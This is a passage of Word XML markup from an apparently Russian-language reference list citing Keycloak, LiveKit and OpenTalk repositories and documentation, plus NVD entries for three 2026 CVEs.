      <w:r w:rsidR="00545F50">
        <w:rPr>
          <w:rStyle w:val="af1"/>
        </w:rPr>
        <w:t>https</w:t>
      </w:r>
      <w:r w:rsidR="00545F50" w:rsidRPr="00545F50">
        <w:rPr>
          <w:rStyle w:val="af1"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>://</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00545F50">
        <w:rPr>
          <w:rStyle w:val="af1"/>
        </w:rPr>
        <w:t>github</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00545F50" w:rsidRPr="00545F50">
        <w:rPr>
          <w:rStyle w:val="af1"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00545F50">
        <w:rPr>
          <w:rStyle w:val="af1"/>
        </w:rPr>
        <w:t>com</w:t>
      </w:r>
      <w:r w:rsidR="00545F50" w:rsidRPr="00545F50">
        <w:rPr>
          <w:rStyle w:val="af1"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidR="001F04CB" w:rsidRPr="001F04CB">
        <w:rPr>
          <w:rStyle w:val="af1"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="001F04CB">
        <w:rPr>
          <w:rStyle w:val="af1"/>
        </w:rPr>
        <w:t>Keycloak</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="001F04CB" w:rsidRPr="001F04CB">
        <w:rPr>
          <w:rStyle w:val="af1"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">» </w:t>
      </w:r>
      <w:r w:rsidR="00545F50" w:rsidRPr="00545F50">
        <w:rPr>
          <w:rStyle w:val="af1"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidR="001F04CB" w:rsidRPr="001F04CB">
        <w:rPr>
          <w:rStyle w:val="af1"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="001F04CB">
        <w:rPr>
          <w:rStyle w:val="af1"/>
        </w:rPr>
        <w:t>Keycloak</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="001F04CB" w:rsidRPr="001F04CB">
        <w:rPr>
          <w:rStyle w:val="af1"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">» </w:t>
      </w:r>
      <w:r w:rsidR="00545F50">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F8ED743" w14:textId="5CEDE3AF" w:rsidR="00545F50" w:rsidRPr="00545F50" w:rsidRDefault="00763E44" w:rsidP="00545F50">
      <w:pPr>
        <w:pStyle w:val="1c"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>LiveKit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00545F50" w:rsidRPr="00545F50">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0070692D">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">– </w:t>
      </w:r>
      <w:r w:rsidR="00545F50" w:rsidRPr="00545F50">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">официальный репозиторий. </w:t>
      </w:r>
      <w:r w:rsidR="0070692D">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidR="00545F50" w:rsidRPr="00545F50">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00545F50">
        <w:t>URL</w:t>
      </w:r>
      <w:r w:rsidR="00545F50" w:rsidRPr="00545F50">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00545F50">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00545F50">
        <w:instrText>HYPERLINK</w:instrText>
      </w:r>
      <w:r w:rsidR="00545F50" w:rsidRPr="00C804D5">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> "</w:instrText>
      </w:r>
      <w:r w:rsidR="00545F50">
        <w:instrText>https</w:instrText>
      </w:r>
      <w:r w:rsidR="00545F50" w:rsidRPr="00C804D5">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:instrText>://</w:instrText>
      </w:r>
      <w:r w:rsidR="00545F50">
        <w:instrText>github</w:instrText>
      </w:r>
      <w:r w:rsidR="00545F50" w:rsidRPr="00C804D5">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:instrText>.</w:instrText>
      </w:r>
      <w:r w:rsidR="00545F50">
        <w:instrText>com</w:instrText>
      </w:r>
      <w:r w:rsidR="00545F50" w:rsidRPr="00C804D5">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:instrText>/</w:instrText>
      </w:r>
      <w:r w:rsidR="00545F50">
        <w:instrText>livekit</w:instrText>
      </w:r>
      <w:r w:rsidR="00545F50" w:rsidRPr="00C804D5">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:instrText>/</w:instrText>
      </w:r>
      <w:r w:rsidR="00545F50">
        <w:instrText>livekit</w:instrText>
      </w:r>
      <w:r w:rsidR="00545F50" w:rsidRPr="00C804D5">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:instrText>"</w:instrText>
      </w:r>
      <w:r w:rsidR="00545F50">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00545F50">
        <w:rPr>
          <w:rStyle w:val="af1"/>
        </w:rPr>
        <w:t>https</w:t>
      </w:r>
      <w:r w:rsidR="00545F50" w:rsidRPr="00545F50">
        <w:rPr>
          <w:rStyle w:val="af1"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>://</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00545F50">
        <w:rPr>
          <w:rStyle w:val="af1"/>
        </w:rPr>
        <w:t>github</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00545F50" w:rsidRPr="00545F50">
        <w:rPr>
          <w:rStyle w:val="af1"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00545F50">
        <w:rPr>
          <w:rStyle w:val="af1"/>
        </w:rPr>
        <w:t>com</w:t>
      </w:r>
      <w:r w:rsidR="00545F50" w:rsidRPr="00545F50">
        <w:rPr>
          <w:rStyle w:val="af1"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="af1"/>
        </w:rPr>
        <w:t>LiveKit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00545F50" w:rsidRPr="00545F50">
        <w:rPr>
          <w:rStyle w:val="af1"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="af1"/>
        </w:rPr>
        <w:t>LiveKit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00545F50">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="25E521A6" w14:textId="731FB1B0" w:rsidR="00545F50" w:rsidRPr="00545F50" w:rsidRDefault="00545F50" w:rsidP="00545F50">
      <w:pPr>
        <w:pStyle w:val="1c"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>OpenTalk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00545F50">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0070692D">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">– </w:t>
      </w:r>
      <w:r w:rsidRPr="00545F50">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">документация администратора. </w:t>
      </w:r>
      <w:r w:rsidR="0070692D">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="00545F50">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r w:rsidRPr="00545F50">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText>HYPERLINK</w:instrText>
      </w:r>
      <w:r w:rsidRPr="00C804D5">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> "</w:instrText>
      </w:r>
      <w:r>
        <w:instrText>https</w:instrText>
      </w:r>
      <w:r w:rsidRPr="00C804D5">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:instrText>://</w:instrText>
      </w:r>
      <w:r>
        <w:instrText>docs</w:instrText>
      </w:r>
      <w:r w:rsidRPr="00C804D5">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:instrText>.</w:instrText>
      </w:r>
      <w:r>
        <w:instrText>opentalk</w:instrText>
      </w:r>
      <w:r w:rsidRPr="00C804D5">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:instrText>.</w:instrText>
      </w:r>
      <w:r>
        <w:instrText>eu</w:instrText>
      </w:r>
      <w:r w:rsidRPr="00C804D5">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:instrText>/26.1/</w:instrText>
      </w:r>
      <w:r>
        <w:instrText>admin</w:instrText>
      </w:r>
      <w:r w:rsidRPr="00C804D5">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:instrText>/"</w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="af1"/>
        </w:rPr>
        <w:t>https</w:t>
      </w:r>
      <w:r w:rsidRPr="00545F50">
        <w:rPr>
          <w:rStyle w:val="af1"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>://</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="af1"/>
        </w:rPr>
        <w:t>docs</w:t>
      </w:r>
      <w:r w:rsidRPr="00545F50">
        <w:rPr>
          <w:rStyle w:val="af1"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="af1"/>
        </w:rPr>
        <w:t>opentalk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00545F50">
        <w:rPr>
          <w:rStyle w:val="af1"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="af1"/>
        </w:rPr>
        <w:t>eu</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00545F50">
        <w:rPr>
          <w:rStyle w:val="af1"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>/26.1/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="af1"/>
        </w:rPr>
        <w:t>admin</w:t>
      </w:r>
      <w:r w:rsidRPr="00545F50">
        <w:rPr>
          <w:rStyle w:val="af1"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="62489DF7" w14:textId="17FA4F30" w:rsidR="00545F50" w:rsidRPr="0070692D" w:rsidRDefault="00545F50" w:rsidP="00545F50">
      <w:pPr>
        <w:pStyle w:val="1c"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>OpenTalk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0070692D">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0070692D">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">– </w:t>
      </w:r>
      <w:r w:rsidRPr="0070692D">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">документация разработчика. </w:t>
      </w:r>
      <w:r w:rsidR="0070692D">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="0070692D">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r w:rsidRPr="0070692D">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText>HYPERLINK</w:instrText>
      </w:r>
      <w:r w:rsidRPr="00C804D5">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> "</w:instrText>
      </w:r>
      <w:r>
        <w:instrText>https</w:instrText>
      </w:r>
      <w:r w:rsidRPr="00C804D5">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:instrText>://</w:instrText>
      </w:r>
      <w:r>
        <w:instrText>docs</w:instrText>
      </w:r>
      <w:r w:rsidRPr="00C804D5">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:instrText>.</w:instrText>
      </w:r>
      <w:r>
        <w:instrText>opentalk</w:instrText>
      </w:r>
      <w:r w:rsidRPr="00C804D5">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:instrText>.</w:instrText>
      </w:r>
      <w:r>
        <w:instrText>eu</w:instrText>
      </w:r>
      <w:r w:rsidRPr="00C804D5">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:instrText>/26.1/</w:instrText>
      </w:r>
      <w:r>
        <w:instrText>developer</w:instrText>
      </w:r>
      <w:r w:rsidRPr="00C804D5">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:instrText>/"</w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="af1"/>
        </w:rPr>
        <w:t>https</w:t>
      </w:r>
      <w:r w:rsidRPr="0070692D">
        <w:rPr>
          <w:rStyle w:val="af1"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>://</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="af1"/>
        </w:rPr>
        <w:t>docs</w:t>
      </w:r>
      <w:r w:rsidRPr="0070692D">
        <w:rPr>
          <w:rStyle w:val="af1"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="af1"/>
        </w:rPr>
        <w:t>opentalk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0070692D">
        <w:rPr>
          <w:rStyle w:val="af1"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="af1"/>
        </w:rPr>
        <w:t>eu</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0070692D">
        <w:rPr>
          <w:rStyle w:val="af1"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>/26.1/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="af1"/>
        </w:rPr>
        <w:t>developer</w:t>
      </w:r>
      <w:r w:rsidRPr="0070692D">
        <w:rPr>
          <w:rStyle w:val="af1"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="16E10392" w14:textId="399AAA83" w:rsidR="00545F50" w:rsidRPr="0070692D" w:rsidRDefault="00545F50" w:rsidP="00545F50">
      <w:pPr>
        <w:pStyle w:val="1c"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>CVE</w:t>
      </w:r>
      <w:r w:rsidRPr="0070692D">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">-2026-7504 </w:t>
      </w:r>
      <w:r w:rsidR="0070692D">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">– </w:t>
      </w:r>
      <w:r w:rsidRPr="0070692D">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">карточка уязвимости в базе </w:t>
      </w:r>
      <w:r>
        <w:t>NVD</w:t>
      </w:r>
      <w:r w:rsidRPr="0070692D">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="0070692D">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">– </w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r w:rsidRPr="0070692D">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText>HYPERLINK</w:instrText>
      </w:r>
      <w:r w:rsidRPr="00C804D5">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> "</w:instrText>
      </w:r>
      <w:r>
        <w:instrText>https</w:instrText>
      </w:r>
      <w:r w:rsidRPr="00C804D5">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:instrText>://</w:instrText>
      </w:r>
      <w:r>
        <w:instrText>nvd</w:instrText>
      </w:r>
      <w:r w:rsidRPr="00C804D5">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:instrText>.</w:instrText>
      </w:r>
      <w:r>
        <w:instrText>nist</w:instrText>
      </w:r>
      <w:r w:rsidRPr="00C804D5">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:instrText>.</w:instrText>
      </w:r>
      <w:r>
        <w:instrText>gov</w:instrText>
      </w:r>
      <w:r w:rsidRPr="00C804D5">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:instrText>/</w:instrText>
      </w:r>
      <w:r>
        <w:instrText>vuln</w:instrText>
      </w:r>
      <w:r w:rsidRPr="00C804D5">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:instrText>/</w:instrText>
      </w:r>
      <w:r>
        <w:instrText>detail</w:instrText>
      </w:r>
      <w:r w:rsidRPr="00C804D5">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:instrText>/</w:instrText>
      </w:r>
      <w:r>
        <w:instrText>CVE</w:instrText>
      </w:r>
      <w:r w:rsidRPr="00C804D5">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:instrText>-2026-7504"</w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="af1"/>
        </w:rPr>
        <w:t>https</w:t>
      </w:r>
      <w:r w:rsidRPr="0070692D">
        <w:rPr>
          <w:rStyle w:val="af1"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>://</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="af1"/>
        </w:rPr>
        <w:t>nvd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0070692D">
        <w:rPr>
          <w:rStyle w:val="af1"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="af1"/>
        </w:rPr>
        <w:t>nist</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0070692D">
        <w:rPr>
          <w:rStyle w:val="af1"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="af1"/>
        </w:rPr>
        <w:t>gov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vuln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detail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CVE</w:t>
      </w:r>
      <w:r w:rsidRPr="0070692D">
        <w:rPr>
          <w:rStyle w:val="af1"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>-2026-7504</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5152AEA9" w14:textId="43F6EBC4" w:rsidR="00545F50" w:rsidRPr="0070692D" w:rsidRDefault="00545F50" w:rsidP="00545F50">
      <w:pPr>
        <w:pStyle w:val="1c"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>CVE</w:t>
      </w:r>
      <w:r w:rsidRPr="0070692D">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">-2026-9704 </w:t>
      </w:r>
      <w:r w:rsidR="0070692D">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">– </w:t>
      </w:r>
      <w:r w:rsidRPr="0070692D">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">карточка уязвимости в базе </w:t>
      </w:r>
      <w:r>
        <w:t>NVD</w:t>
      </w:r>
      <w:r w:rsidRPr="0070692D">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="0070692D">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">– </w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r w:rsidRPr="0070692D">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText>HYPERLINK</w:instrText>
      </w:r>
      <w:r w:rsidRPr="00C804D5">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> "</w:instrText>
      </w:r>
      <w:r>
        <w:instrText>https</w:instrText>
      </w:r>
      <w:r w:rsidRPr="00C804D5">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:instrText>://</w:instrText>
      </w:r>
      <w:r>
        <w:instrText>nvd</w:instrText>
      </w:r>
      <w:r w:rsidRPr="00C804D5">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:instrText>.</w:instrText>
      </w:r>
      <w:r>
        <w:instrText>nist</w:instrText>
      </w:r>
      <w:r w:rsidRPr="00C804D5">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:instrText>.</w:instrText>
      </w:r>
      <w:r>
        <w:instrText>gov</w:instrText>
      </w:r>
      <w:r w:rsidRPr="00C804D5">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:instrText>/</w:instrText>
      </w:r>
      <w:r>
        <w:instrText>vuln</w:instrText>
      </w:r>
      <w:r w:rsidRPr="00C804D5">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:instrText>/</w:instrText>
      </w:r>
      <w:r>
        <w:instrText>detail</w:instrText>
      </w:r>
      <w:r w:rsidRPr="00C804D5">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:instrText>/</w:instrText>
      </w:r>
      <w:r>
        <w:instrText>CVE</w:instrText>
      </w:r>
      <w:r w:rsidRPr="00C804D5">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:instrText>-2026-9704"</w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="af1"/>
        </w:rPr>
        <w:t>https</w:t>
      </w:r>
      <w:r w:rsidRPr="0070692D">
        <w:rPr>
          <w:rStyle w:val="af1"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>://</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="af1"/>
        </w:rPr>
        <w:t>nvd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0070692D">
        <w:rPr>
          <w:rStyle w:val="af1"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="af1"/>
        </w:rPr>
        <w:t>nist</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0070692D">
        <w:rPr>
          <w:rStyle w:val="af1"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="af1"/>
        </w:rPr>
        <w:t>gov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vuln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detail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CVE</w:t>
      </w:r>
      <w:r w:rsidRPr="0070692D">
        <w:rPr>
          <w:rStyle w:val="af1"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>-2026-9704</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C037331" w14:textId="14408214" w:rsidR="00545F50" w:rsidRPr="0070692D" w:rsidRDefault="00545F50" w:rsidP="00545F50">
      <w:pPr>
        <w:pStyle w:val="1c"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>CVE</w:t>
      </w:r>
      <w:r w:rsidRPr="0070692D">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">-2026-9803 </w:t>
      </w:r>
      <w:r w:rsidR="0070692D">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">– </w:t>
      </w:r>
      <w:r w:rsidRPr="0070692D">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">карточка уязвимости в базе </w:t>
      </w:r>
      <w:r>
        <w:t>NVD</w:t>
      </w:r>
      <w:r w:rsidRPr="0070692D">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="0070692D">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">– </w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r w:rsidRPr="0070692D">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText>HYPERLINK</w:instrText>
